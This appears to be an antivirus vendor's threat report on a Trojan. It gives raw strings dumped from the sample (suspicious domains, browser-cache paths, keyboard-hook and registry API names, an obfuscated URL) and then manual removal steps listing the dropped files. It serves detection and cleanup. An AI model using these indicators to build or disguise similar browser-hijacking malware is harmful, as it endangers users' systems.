VVV.111146.com
9927qqq.com
b365444.com
aygj587.com
hb3333.com
ddh111.com
9599qq.com
ji586987.com
VVV.tycjt1.com
95993333.cc
milan86.com
ylg9099.com
yl882288.com
yinhemmm.com
blm0000.com
VVV.bmw7.com
VVV.ca151.com
ad.517dapai.com
59bo.com
VVV.b22138.com
VVV.4662.com
VVV.23456.com
VVV.f402.com
VVV.anhui365.net
ylg9999.com
newbet6.com
VVV.mg123.cm
tlc187.com
VVV.sdw11.com
dhy0022.com
991991.cc
VVV.mr007.com
yo56378.com
fa74955.com
{844D7191-2FEF-4d2b-AB06-718517B0BFC5}
{684EF56E-2FAE-4ed2-BF46-F0440C5BE24F}
C:\Windows\system32\winlogon.exe
C:\Windows\SYSTEM32\ntdll.dll
C:\Windows\SysWOW64\wxpolice64.dll
C:\Windows\Explorer.EXE
C:\Windows\system32\SHLWAPI.dll
C:\Windows\system32\fxsst.dll
C:\Windows\system32\msvcrt.dll
C:\Windows\System32\MMDevApi.dll
C:\Windows\system32\WINMM.dll
C:\Windows\system32\UIAutomationCore.dll
winlogon.exe
TMyIdTCPServerEventCall
TMyIdUDPServerEventCallU
NTDLL.DLL
$%X,$%X; $%X,$%X; %d KB
.hao123.com
2345.5636lm.com
VVV.baidu.com/
$%X,$%X; $%X,$%X;
123.sogou.com
123abc.dll
TMyCheckOpenUrl
TDRIVER_UrlWatchList
a.baidu.com
c.baidu.com
s.baidu.com
cb.baidu.com
cbjs.baidu.com
sclick.baidu.com
dict.baidu.com
gimg.baidu.com
n.baidu.com
nsclick.baidu.com
picache.baidu.com
share.baidu.com
suggestion.baidu.com
s1.bdstatic.com
vie.baidu.com
play.bat
hXXps://123.sogou.com/?71156-5497
b~~z0%%}}}$cz;92$ieg%czy;922$kyz
b~~z0%%cz$ik~x$id%
<2> 2222,
<2> 1111,
b~~z0%%cz$ndyorc~$ieg%
pWin7Server.exe
KERNEL32.DLL
360Chrome\Chrome\
CacheIE\Content.IE5
Content.IE5
SogouExplorer\Webkit\Default\
Google\Chrome\
Opera\Opera\
application_cache\cache_groups.xml
Mozilla\Firefox\Profiles\
AppData\Local\Microsoft\Windows\
;8=$:$:$;
00-00-00-00-00
SoftWare\Microsoft\Windows NT\CurrentVersion\NetworkCards
SoftWare\Microsoft\Windows NT\CurrentVersion\NetworkCards\
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
SetRegKey Error:
*.lnk
*.url
%d.%d.%d.%d
fash.exe
txupd.exe
inflate 1.2.8 Copyright 1995-2013 Mark Adler
;3 #>6.&
'2, / 0&7!4-)1#
G.uNn.
43210/.-, *)('&%$#"!
x%u]1
*?.Uk='
p0@%c
TC"-c}
L.YC~
r%s^,
E[.Pg
L)%.F
,.WMuU`
V.KS7
aF.IU}1
E2.ySz
%6XOi
EM;.Qj
m.tkT
.wtf6
C.PU7
i%dUFm
1%Uvb
V9CRT
2'l.tDg
v.EUH
6.CZg_
@6IEXe
.Ja,<3A
?456789:;<=
!"#$%&'()* ,-./0123
%WinDir%\CLOG.txt
2016-09-22
21:37:18
21:37:15
21:37:16
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
RegSetKeySecurity
RegQueryInfoKeyA
RegNotifyChangeKeyValue
RegFlushKey
RegEnumKeyExA
RegDeleteKeyA
RegCreateKeyExA
GetWindowsDirectoryA
GetProcessHeap
GetCPInfo
version.dll
gdi32.dll
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
GetProcessHandleCount
shell32.dll
ShellExecuteA
SHFileOperationA
wininet.dll
FindNextUrlCacheEntryA
FindFirstUrlCacheEntryA
FindCloseUrlCache
DeleteUrlCacheEntry
URLMON.DLL
UrlMkGetSessionOption
ADVAPI32.DLL
wsock32.dll
Rpcrt4.dll
OLEACC.DLL
333333333333333333
33333833
3333339
3333333333333338
:*"*"$3338
3333333
33333333
33333333333
3333333333338
33338?383
333333333333
:*3:"$3338
333333333333333
KWindows
IdTCPStream
 IdTCPServer
UrlMon
MyHTTPSProxyRF
0IdHTTPHeaderInfo
((&)))!&$
%)01$$'&,--%
38000=344
1 0 .'7(2':
- /*-( ,''.-!$$$&'(/
( ,''.-!$$$&'(/*) ,*/.)*72-9
, ,-, ,-, ,-, ,-, ,-, ,-, ,-, ,-, ,-, ,-, ,-, ,-, ,-, ,-,
86\22,-!'
PLicense information for %s not found. You cannot use this control in design modeNUnable to retrieve a pointer to a running object registered with OLE for %s/%s=Instruction TLB, 4Kb pages, 4-way set associative, 32 entries8Instruction TLB, 4Mb pages, fully associative, 2 entries6Data TLB, 4Kb pages, 4-way set associative, 64 entries5Data TLB, 4Mb pages, 4-way set associative, 8 entries?8KB instruction cache, 4-way set associative, 32 byte line size@16KB instruction cache, 4-way set associative, 32 byte line size78KB data cache 2-way set associative, 32 byte line size916KB data cache, 4-way set associative, 32 byte line size
No help keyword specified.
OLE control activation failed*Could not obtain OLE control window handle%License information for %s is invalid
Alt  Clipboard does not support Icons/Menu '%s' is already being used by another form
No help found for %s#No context-sensitive help installed$No topic-based help system installed
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
SSL status: "%s"
Metafile is not valid!Cannot change the size of an icon Invalid operation on TOleGraphic
Unsupported clipboard format
Command not supported.
Address type not supported.$Error accepting connection with SSL.
Error creating SSL context. Could not load root certificate.
Could not load certificate.#Could not load key, check password.
Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.
Socket type not supported."Operation not supported on socket.
Protocol family not supported.0Address family not supported by protocol family.
Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.
%s is not a valid IP address.
Operation would block.
Operation now in progress.
Operation already in progress.
Socket operation on non-socket.
Protocol not supported.
No command handler found.*Error on call Winsock2 library function %s&Error on loading Winsock2 library (%s)
Resolving hostname %s.
Connecting to %s.
Chunk StartedDThis authentication method is already registered with class name %s.
%s is not a valid service.
Socket Error # %d
File "%s" not found1Only one TIdAntiFreeze can exist per application.
No execute handler found.
No data to read.$Can not bind in port range (%d - %d)
Invalid Port Range (%d - %d)
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.
'%s' is an invalid mask at (%d)$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Unable to write to %s
Operation not supported
External exception %x
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
Invalid variant operation
Invalid NULL variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
!'%s' is not a valid integer value('%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time
I/O error %d

%original file name%.exe_2044_rwx_018D2000_00002000:

<requestedExecutionLevel level="requireAdministrator"/>
kernel32.dll
user32.dll
GetKeyboardType
advapi32.dll
oleaut32.dll
version.dll
gdi32.dll
ole32.dll
ntdll.dll
comctl32.dll
shell32.dll
ShellExecuteA
wininet.dll
FindNextUrlCacheEntryA
URLMON.DLL
UrlMkGetSessionOption
wsock32.dll
Rpcrt4.dll
OLEACC.DLL
psapi.dll
%sy5|l

%original file name%.exe_2044_rwx_10001000_00039000:

GetProcessWindowStation
RtlCreateRegistryKey
zcÁ
.bS[9
P.fX[9
.pZ[9q
.fJ[9
.Vg-Q
.TV[9!
.FV[9
.rV[9
\.Dd[9
.zQ[9}W
.XR[9
.lQ[9D
.NT[9
W[.jR[9N H&!/m<
.wG[9
.Ou[9
.gJ[9
! -d.pN[9
.Mt[9
n\.cm[9
W[.UB[9
.gf[9
W[.Pz[9
.vI[9
l.Eu[9Ho
O-.qF
c:\%original file name%.exe
GetProcessHeap
GetCPInfo
.text
`.rdata
@.data
.rsrc
@.reloc
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
\DosDevices\%s
\Registry\Machine\System\CurrentControlSet\Services\%s
\??\%s
%s\%s
kernel32.dll
W%s\%x
ntdll.dll
\\.\%s
%s.bak
\\.\9P00FgsFjdc


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
  3. Delete the original Trojan file.
  4. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %WinDir%\JoYJKb\obTCfBhEA.dll (144 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Favorites\Links\Windows Marketplace.url (262 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\jscript_jquery-1.4.2.min[1].js (2740 bytes)
    %WinDir%\JoYJKb\498E9.dat (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\175sf[1].htm (4364 bytes)
    %WinDir%\CLOG.txt (5129 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (865 bytes)
    %WinDir%\JoYJKb\NDTmWEYYA.tmp (12 bytes)
    %System%\128b12\CDClient_EX.sys (125 bytes)
    %WinDir%\JoYJKb\DbHnhAd.dll (12780 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\style[1].css (17 bytes)
    %WinDir%\KXQgMV.dll (11 bytes)

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now